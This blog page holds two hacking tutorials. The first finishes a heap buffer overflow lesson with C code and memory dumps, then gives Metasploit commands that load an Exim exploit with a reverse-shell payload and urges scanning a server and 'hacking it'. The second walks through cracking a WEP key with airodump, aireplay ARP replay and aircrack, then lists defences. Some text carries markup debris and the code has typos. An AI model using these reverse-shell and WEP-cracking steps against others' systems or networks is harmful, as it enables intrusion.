-----------End of Partial Code-----------

Now You Will Say

Wow what the hell is this  ??? :p


Well I just add 2 lines in the source code and left the rest unchanged. Let's see what does two lines do.


The printf("%p\n%p", somevar, important); line will print the memory addresses for somevar and important variables. The exit(0); will just keep the rest of the program running after all you don't want it for nothing, your goal was to know where is the variables are stored.

After running the program you would get an output like, you will probably
not get the same memory addresses:


0x8049700 <----- data-blogger-escaped-address="" data-blogger-escaped-is="" data-blogger-escaped-of="" data-blogger-escaped-somevar="" data-blogger-escaped-span="" data-blogger-escaped-the="" data-blogger-escaped-this="">
0x8049710 <----- data-blogger-escaped-address="" data-blogger-escaped-important="" data-blogger-escaped-is="" data-blogger-escaped-of="" data-blogger-escaped-span="" data-blogger-escaped-the="" data-blogger-escaped-this="">


As we can see, the important variable is next somevar, this will let us use our buffer overflow skills, since somevar is got from argv[1]. Now, we know that one follow the other, but let's check each memory address so we can have the precise notion of the data storage. To do this let's re-write the code again.

--------Partial code------------
main(int argc, char **argv) {
char *somevar;
char *important;
char *temp; /* will need another variable */
somevar=(char *)malloc(sizeof(char)*4);
important=(char *)malloc(sizeof(char)*14);
strcpy(important, "command"); /*This one is the important variable*/
stcrpy(str, argv[1]);
printf("%p\n%p\n", somevar, important);
printf("Starting To Print memory address:\n");
temp = somevar; /* this will put temp at the first memory address we want*/
while(temp < important + 14) {
/* this loop will be broken when we get to the last memory address we want, last memory address of important variable */
printf("%p: %c (0x%x)\n", temp, *temp, *(unsigned int*)temp);
temp++;
}
exit(0);
rest of code here
}
--------------End Of partial Code----------

Now let's say that the argv[1] should be in normal use send. So you just type in your prompt:

$ program_name send

You'll get an output like:

0x8049700
0x8049710

Starting To Print memory address:
0x8049700: s (0x616c62)
0x8049701: e (0x616c)
0x8049702: n (0x61)     <---- data-blogger-escaped-a="" data-blogger-escaped-address="" data-blogger-escaped-each="" data-blogger-escaped-lines="" data-blogger-escaped-memory="" data-blogger-escaped-of="" data-blogger-escaped-represent="" data-blogger-escaped-span="" data-blogger-escaped-this="">
0x8049703: d (0x0)
0x8049704: (0x0)
0x8049705: (0x0)
0x8049706: (0x0)
0x8049707: (0x0)
0x8049708: (0x0)
0x8049709: (0x19000000)
0x804970a: (0x190000)
0x804970b: (0x1900)
0x804970c: (0x19)
0x804970d: (0x63000000)
0x804970e: (0x6f630000)
0x804970f: (0x6d6f6300)
0x8049710: c (0x6d6d6f63)
0x8049711: o (0x616d6d6f)
0x8049712: m (0x6e616d6d) < command
0x8049713: m (0x646e616d)
0x8049714: a (0x646e61)
0x8049715: n (0x646e)
0x8049716: d (0x64)
0x8049717: (0x0)
0x8049718: (0x0)
0x8049719: (0x0)
0x804971a: (0x0)
0x804971b: (0x0)
0x804971c (0x0)
0x804971d: (0x0)
$


Nice isn't it? You can now see that there exist 12 memory address empty between somevar and important. So let's say that you run the program with a command line like:


$ program_name send------------newcommand


You'll get an output like:


0x8049700
0x8049710
Starting To Print memory address:
0x8049700: s (0x646e6573)
0x8049701: e (0x2d646e65)
0x8049702: n (0x2d2d646e)
0x8049703: d (0x2d2d2d64)
0x8049704: - (0x2d2d2d2d)
0x8049705: - (0x2d2d2d2d)
0x8049706: - (0x2d2d2d2d)
0x8049707: - (0x2d2d2d2d)
0x8049708: - (0x2d2d2d2d)
0x8049709: - (0x2d2d2d2d)
0x804970a: - (0x2d2d2d2d)
0x804970b: - (0x2d2d2d2d)
0x804970c: - (0x2d2d2d2d)
0x804970d: - (0x6e2d2d2d)
0x804970e: - (0x656e2d2d)
0x804970f: - (0x77656e2d)
0x8049710: n (0x6377656e) <--- data-blogger-escaped-address="" data-blogger-escaped-important="" data-blogger-escaped-memory="" data-blogger-escaped-span="" data-blogger-escaped-starts="" data-blogger-escaped-variable="" data-blogger-escaped-where="">
0x8049711: e (0x6f637765)
0x8049712: w (0x6d6f6377)
0x8049713: c (0x6d6d6f63)
0x8049714: o (0x616d6d6f)
0x8049715: m (0x6e616d6d)
0x8049716: m (0x646e616d)
0x8049717: a (0x646e61)
0x8049718: n (0x646e)
0x8049719: d (0x64)
0x804971a: (0x0)
0x804971b: (0x0)
0x804971c: (0x0)
0x804971d: (0x0)


New command got over command. Now it does something you want, instead of something he was supposed to do.


NOTE: Remember sometimes those spaces between somevar and important can have other variables instead of being empty, so check their values and send them to the same address, or the program can crash before getting to the variable that you modified. Now let's think a little.

Why does this happen?

> As you can see in the sourcecode somevar is declared before important, this will make, most of the
times,that somevar will be first in memory. Now, let's check how each one is got. Somevar gets it's value from argv[1], and important gets it from strcpy() function, but the real problem is that important value is assign first so when you assign value to somevar that is before it important can be overwritten.
This program could be patched against this buffer overflow switching those two lines, 

becoming :
strcpy(somevar, argv[1]);
strcpy(important, "command");


If this was the way that the program was done even if you give an argument that would get into the memory address of important, it will be overwritten by the true command, since after getting somevar, is assign the value command to important. This kind of buffer overflow, is a heap buffer overflow. Like you probably has seen they are really easy to do in theory but, in the real world, it's not really easy to do them, after all the example I gave was a really dumb program right? It's a real pain in the ass to find those important variables, and also to overflow that variable you need to be able to write to one that is in a lower memory address, most of times all this conditions This why we find bugs in the must used Softwares. Like real player ; VLC player ; and many Even adobe flash to see Videos on Youtube and Facebook was infected. Everyday Bug researchers discover bugs on many softwares but the good thing not all Hackers on the world can do it :D and alwayes there are an update and patches to keep your PCs and Servers protected. This why u find on my index admin patch your ass XD. The Buffer Overflow is like a sea if you are really interested and you wanna learn everything about it see Wiki.


This lesson I read a lot of Articles they really help me to explain to people the BOF.
Let's see the Best Tools of Hacking You know what I'm Talking about
Yeah it's The Metasploit Project .

*********************************

3) The Metasploit Project

I guess that must of you know this great software but if you don't read this :


The Metasploit Project is an open-source computer security project which provides
information about security vulnerabilities and aids in penetration testing and IDS
signature development. Its most well-known sub-project is the Metasploit Framework, a
tool for developing and executing exploit code against a remote target machine. Other
important sub-projects include the Opcode Database, shellcode archive, and security
research.


I guess now you have an idea about metasploit. Most of people think that metasploit I just for hack PCs -[-' they are really jerks.
Ok , you have a server IP and u wanna test hack it if you don't find a script kids or no exploits on PHP what do you do .? hein First of all get nmap and scan the server check the open port softwares
then hack it if you lucky you will find the version not patched.^^  I advise everybody to Get Backtrack 5.


I will give you an example of how to use metasploit
$ msfconsole
METASPLOIT
msf > use exploit/unix/smtp/exim4_string_format
msf exploit(exim4_string_format) > show payloads
msf exploit(exim4_string_format) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(exim4_string_format) > set LHOST [MY IP ADDRESS]
msf exploit(exim4_string_format) > set RHOST [TARGET IP]
msf exploit(exim4_string_format) > exploit


This are just simple example for how to use metasploit on exim exploit ;).


END

Finally, I wanna say Good Luck :D

a very beautifully explained article from 0xHat book ,, regards him and bloggerized article by

Zulqurnain jutt

What is Wireless Hacking And its working

( by T3es)

Wireless networksarewidelyused in todays life and easy to manage,Wireless networks are everywhere they are widely available, cheap, and easy to setup. To avoid the hassle of setting up a wired network in my own home, I chose to go wireless. After a day of enjoying this wireless freedom, I began thinking about security. How secure is my wireless network? I searched the Internet for many days, reading articles, gathering information, and participating on message boards and forums. I soon came to the realization that the best way for me to understand the security of my wireless network would be to test it myself. Many sources said it was easy, few said it was hard. 

How a wireless network works

A wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. All devices that can connect to a wireless network are known as stations. Stations can be access points (APs), or clients.
Access points are base stations for the wireless network. They receive and transmit information for the clients to communicate with.
The set of all stations that communicate with each other is referred to as the Basic Service Set (BSS). Every BSS has an Identification known as a BSSID, also known as the MAC address, which is a unique identifier that is associated with every NIC.
For any client to join a WLAN, it should know the SSID of the WLAN; therefore, the access points typically broadcast their SSID to let the clients know that an AP is in range.
Data streams, known as packets, are sent between the Access Point, and it’s clients. You need no physical access to the network or its wires to pick up these packets, just the right tools. It is with the transmission of these packets that pose the largest security threat to any wireless network.

Wireless Encryption

The majority of home and small business networks are encrypted using the two most popular methods:

• WEP
• WPA

WEP:

    Wired Equivalent Privacy – comes in 3 different key lengths: 64, 128, and 256 bits, known as WEP 64, WEP 128, and WEP 256 respectively. WEP provides a casual level of security but is more compatible with older devices; therefore, it is still used quite extensively. Each WEP key contains a 24 bit Initialization Vector (IV), and a user-defined or automatically generated key; for instance, WEP 128 is a combination of the 24 bit IV and a user entered 26 digit hex key. ((26*4)+24=128)
WEP also comes in WEP2 and WEP+, which are not as common and still as vulnerable as the standard WEP encryption.

WPA:

   WiFi Protected Access – comes in WPA and WPA2, and was created to resolve several issues found in WEP. Both provide you with good security; however, they are not compatible with older devices and therefore not used as widely. WPA was designed to distribute different keys to each client; however, it is still widely used in a (not as secure) pre-shared key (PSK) mode, in which every client has the same passphrase.
To fully utilize WPA, a user would need an 802.1x authentication server, which small businesses and typical home users simply cannot afford. WPA utilizes a 48 bit Initialization Vector (IV), twice the size of WEP, which combined with other WEP fixes, allows substantially greater security over WEP.

Packets and IVs

It’s all in the packets. The bottom line is – while you may be able to employ several security features on your WLAN – anything you broadcast over the air can be intercepted, and could be used to compromise the security on your network. If that frightens you, start stringing wires throughout your home.
Every encrypted packet contains a 24 or 48 bit IV, depending on the type of encryption used. Since the pre-shared key is static and could be easily obtained, the purpose of the IV is to encrypt each packet with a different key. For example, to avoid a duplicate encryption key in every packet sent, the IV is constantly changing. The IV must be known to the client that received the encrypted packet in order to decrypt it; therefore, it is sent in plaintext.
The problem with this method is that the Initialization Vectors are not always the same. In theory, if every IV was different, it would be nearly impossible to obtain the network key; this is not the case. WEP comes with a 24 bit IV; therefore, giving the encryption 16 million unique values that can be used. This may sound like a large number, but when it comes to busy network traffic, it’s not.
Every IV is not different; and this is where the issues arise. Network hackers know that all the keys used to encrypt packets are related by a known IV (since the user entered WEP part of the key is rarely changed); therefore, the only change in the key is 24 bits. Since the IV is randomly chosen, there is a 50% probability that the same IV will repeat after just 5,000 packets; this is known as a collision.
If a hacker knows the content of one packet, he can use the collision to view the contents of the other packet. If enough packets are collected with IV matches, your network’s security can be compromised.

The Setup

My wireless network was powered by a Linksys WRT54G v6 wireless router; It is well known that this model is the most widely used wireless router. Out of the box, the Linksys router came with 1 CD which was nothing more than a visual step by step, what you should do to connect it.
A few things concern me with this router. There was no part in the setup that allowed me, or even told me to change my router’s default password. To change the password, I had to go into the router’s web-based setup utility; this was accessible via the IP address 192.168.1.1 in my Internet browser. The default username and password was admin. If someone was able to compromise the security on my network, they could have easily done this for me; and locked me out of my own network. Sure, I could have performed a hard reset on the router, but I’d have little luck without the Internet or any documentation to help.
If you’re looking to find your default username and password, there is quite a comprehensive list located at www.phenoelit.de My advice is to change this immediately, for it may save you some trouble down the road.
Being my first time, I decided to go easy; I set my router up with a basic WEP 64 encryption; it required a 10 digit hex key. I entered the key into the 2 other computers in my home, and I was ready to start.

Hardware

Out of everything I’ve experienced over the last couple weeks, this was the hardest obstacle, by far. I started with a Dell Latitude C610 notebook with a Linksys WPC54GS Wireless-G notebook adapter (Broadcom chipset) running Windows XP Pro; looking back, it was a bad choice.
When selecting hardware, be warned, not all network cards are the equal. It turns out that nearly 99% of the software used to crack network keys are not compatible with notebook cards that have a Broadcom chipset; the ones that were just didn’t work.
9 out of every 10 articles I read boasted the Orinoco Gold PCMCIA network card by Lucent was the absolute best pick and most compatible will all the good software. A trip to E-Bay, $30 later, and I was ready.
The software we will be using is strictly dependent on the chipset of the WNIC, and unfortunately, the operating system. Your best approach would be to research what software you will be using, and then find a card based on the chipset the software is compatible with.
There are many types of chipsets; too many, in fact, to mention. Linux-wlan.org has an unbelievably comprehensive list of WNICs and their corresponding chipset.
All the best programs are made for Linux; windows is certainly a drag when it comes to WLAN penetrating software, but if you don't have Linux, don't be too concerned.
It may be in your best interest to invest in a wireless card that has an external antenna jack. The Orinoco Gold WNIC I purchased has one, but since I'm compromising my own network in a short range, it won’t be necessary.

The Software

There are hundreds of applications you can use to do a variety of things with wireless networks. The largest list of software, that I came across, can be found at Wardrive.net. The term “wardriving” is more commonly used for this practice, and involves driving around neighborhoods to look for wireless networks. I refuse to use this term because that is not what I am doing; I am sitting in my home testing the vulnerabilities of my own network.
Let it be known, that it is not illegal to use software to detect the presence of wireless networks; however, if you crack the network and start “stealing” bandwidth, you could be in a world of trouble. Especially if you’re in Singapore.
Once I received my Orinoco card, I began re-installing software which did not previously work with my Linksys card. It was a nightmare; Windows XP kept getting in the way, software that had been modded to run on windows required daunting tasks for installation, some programs simply didn't work, some required special run time modules to be installed.
After nearly 48 hours of time-wasting, aggravating, disappointment; I came across the answer. A small penguin shone a beam of light upon my browser and blessed me; I found Auditor.
(2/6/07 - The link is currently not working, but you can obtain Auditor through any Torrent service.)
Auditor Security Collection is a self booting Linux-based CD that comes pre-loaded with all the best security software for auditing a system. It comes in a .ISO file that can be downloaded from remote-exploit.org; the ISO image file is roughly 649 Mb, and can be burned to a CD or DVD using most CD/DVD writing utilities.
It was truly amazing; a simple check in the Bios of the laptop to set the boot order to CD/DVD first, a slip of the Auditor CD, and a press of the power button was all it took. I was ready. Be not afraid of this Linux-based CD; everything is laid out on a GUI and all commands have “shortcuts” linking to them on a desktop similar to a windows environment.
Auditor Security Collection does not touch a single file on your hard drive. All files used and saved in the ASC are stored in your notebook’s RAM; once you remove the CD and reboot, everything is exactly as it was.

Detecting my wireless network

If you’ve come this far, believe me, you’re doing well. The first step is to find the network you want to penetrate. As there are a variety of apps that allow you to do this, we will be focusing in on the 2 most popular: Netstumbler, and Kismet.
Netstumber - is a widely popular tool used for detecting 802.11a/b/g wireless networks. The latest version is Netstumbler 0.4.0, and will run in Windows XP. For compatible hardware and requirements, you can check the read me on the Netstumbler forums; or you could just try it. I’d like to point out that many sources have said the Linksys WPC54G/S WNIC does not work with Netstumbler; however, I have been able to make it work by launching the program, then removing and re-inserting the WNIC. The Orinoco Gold works fine with Netstumbler.
Kismet – does a little more than just detecting networks. Aside from providing every detail about a network except the encryption key, Kismet is a packet sniffer and intrusion detection system; we’ll get into sniffing packets a little later.
For this demonstration, we’ll be using the pre-loaded Kismet on the Auditor Security Collection. After inserting and booting the Auditor CD, I was ready to make sure everything was working properly.
From this point, the first thing that needed to be done was to ensure the wireless card was recognized by Auditor; to do this, you will have to venture into the dark world of the command prompt. In Auditor, the command prompt can be reached by clicking on the little black monitor icon located at the bottom of your screen.
Simply typing in iwconfig will allow you to see all the wireless extensions configured on the machine. If you see a screen full of data next to a WLAN0 or ETH0, you’re ready to continue to the next step; otherwise, you will see a list of “no wireless extensions” messages.
Next, you will need to start the Kismet program. You'll initially be prompted to enter a destination to save data to; you can just select the ’desktop’ and continue. When Kismet loads, you will see a black screen with green text showing all the wireless networks within you signal range.
Kismet will give you all the information you need to start cracking. Pressing ’s’ on your keyboard will bring up a ”Sort Network” dialogue box. From there you can press any of the desired sorting methods. This step is important as it allows you to select a particular wireless network on a list to view more details. Select your network with the arrow keys and press enter.
You will then be looking at nearly all your network details such as name, ssid, server IP, bssid, etc… Most are not relevant in this case, but you should write down a few things:
BSSID
Channel #
Encryption methodPressing ‘x’ in Kismet will return you to the previous screen. re-select your target WLAN; then press ‘SHFT+C’ to bring up a list of associated clients to the Access Point. Write down the MAC address of all clients as it will prove useful.

Capturing packets

While you may have not been aware, at this point, Kismet has also been capturing packets. This is the bread and butter of cracking any wireless encryption; without data to process you have nothing.
Capturing packets, also known as packet sniffing, is the process of intercepting and logging traffic passing over a network. As information is sent and received over your wireless network, the software captures every packet to allow you to analyze and decode it.
Capturing network traffic can be a timely process; especially if it is a slow network. With no-one on any computers in my home, I generally capture around 3,000 packets within 5 minutes; with users on the other 2 computers, this number is substantially greater. Don’t get confused, it’s not the packet itself that we want; but rather the IVs in the packets.
The programs we will be using to sniff packets are Kismet and Airodump (part of the Aircrack Suite). We've already touched Kismet, so lets take a look at Airodump.
Before running Airodump, you must configure your wireless interface to go into ’monitor’ mode; the methods to achieve this require you to go back to the command prompt (konsole).
For most WNICs, you would use the command:
iwconfig mode monitor
And in some instances would have to set the channel number on your WNIC to match that of the target access point:
iwconfig channel #
Note that you will have to replace with the network interface specific to your machine. Using an Orinoco Gold card, my network interface was eth0; but on most machines, it is wlan0 or ath0. So you may have to adjust those commands accordingly. You can find out for sure by simply typing iwconfig.
I should also point out that putting the Orinoco Gold card in ‘monitor’ mode had a different command altogether:
iwpriv eth0 monitor 2 1
Once your in monitor mode, you’re ready to run Airodump. The command used to start Airodump is:
airodump

[mac filter]

can be anything you wish; Airodump will put a .cap extension on the end of the name. The mac filter is used to only capture packets from a specific access point. For instance, I used:
airodump eth0 george 00:18:f8:65:fe:41
to capture packets just from my access point - where 00:18:f8:65:fe:41 is the BSSID of the AP.
Airodump looks similar to Kismet, but there are no selectable objects on the screen; it gets right down to it, capturing packets and storing them in the .cap file as defined in the command. You’ll notice Airodump keeps a running count of all the packets captured, and better yet, shows you the number of IVs collected.

The waiting game

The hard truth is that you will need to collect nearly 150,000 IVs to crack a 64 bit WEP key, and around 600,000 IVs to crack a 128 bit WEP key. This number varies, but is mostly dependent on how luck you are. If you watch the IV count in Airodump, you’ll notice that, under normal circumstances, they do not rise rapidly.
This can cause a problem; particularly if you’re as impatient as I am. Let’s take a look at some ways we can speed up this process.
Until now, we’ve been using a method known as a passive attack. A passive attack is basically doing nothing other than passively capturing packets until you have achieved enough data to perform the crack.
Most access points need their client to re-associate after a certain period of time to confirm their connection; therefore, the AP will send out an Address Resolution Protocol (ARP) packet. The ARP packet is unique in that is always addressed to the MAC address FF:FF:FF:FF:FF:FF, usually has a size of 68 bytes, and has the ToDS flag set.
We can use this information to implement an ARP replay attack. For this method, we will be using Aireplay (part of the Aircrack Suite). Aireplay can be used to actually re-send packets that it has received.
Leave Airodump running, and open a new command window. The command we’ll be using for Aireplay is:
aireplay -i -m 68 -n 68 -d ff:ff:ff:ff:ff:ff -b 00:18:f8:65:fe:41 eth0
The -i tells Aireplay to capture packets on the fly; the -m 68 and -n 68 tells aireplay that you only want it to replay packets that are 68 bytes. The -d and -b are the destination MAC address and AP MAC Address(BSSID) respectively. This is the criteria that is defined for our ARP packet, which is usually associated with an IV.
Alternatively, you may have already captured one of these packets. You can have Aireplay check the .cap file from Airodump with the -f switch:
aireplay -f george.cap -m 68 -n 68 -d ff:ff:ff:ff:ff:ff -b 00:18:f8:65:fe:41 eth0
In either case, If Aireplay finds a match to our specifications, it will show you the details of the packet and ask if you would like to replay it. If the details look exactly as shown below, press ‘y’ for yes.
FromDS = 0, ToDS = 1
BSSID =
Src. MAC =
Dst. MAC = ff:ff:ff:ff:ff:ff
Aireplay will then begin to replay the packet; if you’ve found a winning packet, you will notice your packet and IV count in Airodump rise extremely quick. If not, only the packet count in Airodump will rise; If this be the case, press CTRL+C to abort the operation, restart aireplay, and try again.
It has been noted that some routers will detect this erratic behavior and block the MAC address of the WNIC you are using. Adding a -x switch followed by a “replay per second #” will slow down the rate at which Airplay replays these packets.
If your lucky enough, you will have collected enough IVs in little time. For me, it took 28 minutes including booting up, writing down the network specs, and typing all those lengthy commands.
There are other methods such as Dueth attacks which force the clients off the AP, causing them to have to re-associate; but these methods require a second computer.

The crack

Two of the most popular programs used for actually cracking the WEP key are Airsnort and Aircrack. Airsnort can be used with the .dump files that Kismet provides; and Aircrack can be used with the .cap files that Airodump provides.
Airsnort can be used on it’s own without any other software capturing packets; although, it has been reported to be extremely unstable in this state, and you should probably not chance loosing all your captured data. A better method would be to let Airsnort recover the encryption key from your Kismet .dump file. Kismet and Airsnort can run simultaneously.
For this demonstration, we’ll be using Aircrack. You can use Airodump to capture the packets, and Aircrack to crack the encryption key at the same time.
With Airodump running, open a new command window and type:
aircrack -f 3 -n 64 -q 3 george.cap
The -f switch followed by a number is the fudgefactor; which is a variable that the program uses to define how thoroughly it scans the .cap file. A larger number will give you a better chance of finding the key, but will usually take longer. The default is 2.
The -n switch followed by 64 represents that you are trying to crack a WEP 64 key. I knew because it was a setup; In the real world there is no way to determine what WEP key length a target access point is using. You may have to try both 64 and 128.
The -q 3 switch was used to display the progress of the software. It can be left out altogether to provide a faster crack; although, if you’ve obtained enough unique IVs, you should not be waiting more than a couple minutes.
A -m switch can be used, followed by a MAC address, to filter a specific AP’s usable packets; this would come in handy if you were collecting packets from multiple APs in Airodump.
Aircrack recovered my WEP 64 key within 1 minute using 76,000 unique IVs; the whole process took around 34 minutes.
The same experiment was repeated with WEP 128 and it took about 43 minutes. The reason it was not substantially longer is because I simply let Airplay replay more packets. Sometimes you can get lucky and capture an ARP Request packet within a few minutes; otherwise, it could take a couple hours.
After I had access to the network, many doors opened up. Aside from having access to the Internet, I was able to use Networkview – a network discovery tool – to obtain my network’s workgroup name. From there, I had access to all the shared files on my drives.
While I’m no expert in the subject, I can at least assume that many horrible things could happen if the wrong hands were to obtain my WLAN encryption key. 

The conclusion

Always use WPA or WPA2 encryption when possible. If your using WPA with a pre-shared key, use a strong password; hackers can use dictionary attacks, and they will be quite effective if you have an easy password. You may want to use a strong password generator like the one at grc.com.
If your access point supports it, you may want to consider disabling wireless SSID broadcast; however, this may raise some issues with the APs clients recognizing it. (Kismet will still recognize it)
Many routers will allow you to filter what clients can access the network; this is known as Wireless MAC Filtering. If you know the MAC address of the clients you are using, you can enter them into your configuration utility as “Permit ONLY”. This is not a 100% effective method; MAC addresses can be cloned to match the AP’s associated clients, but it does provide you with a slightly higher level of security. (there is a utility on Auditor to allow you to do this)
By default, your router may be set to mixed mode; this allows 802.11b and 802.11g devices to access your network. If you use only 802.11g devices, set your router to G-ONLY. Had my router been set this way, I would have never been able to do any of this. The Orinoco Gold card is 802.11b, and is obviously not compatible with a 802.11g network. Many 802.11g cards are not supported by the software we’ve used in this tutorial, but few are. While your at it, please change your default router username and password.
While I haven’t tried my hand at cracking a WPA encryption, the methods are similar when the WLANs use pre-shared keys (psk); I do plan on trying it, and I will surely write an update to let you know how/if it was done.
By no means am I claiming to be an expert in this field; If you’ve noticed anything that was incorrect or just have something to add, please feel free to drop a comment.

Thanks,

Regards,
Zulqurnain jutt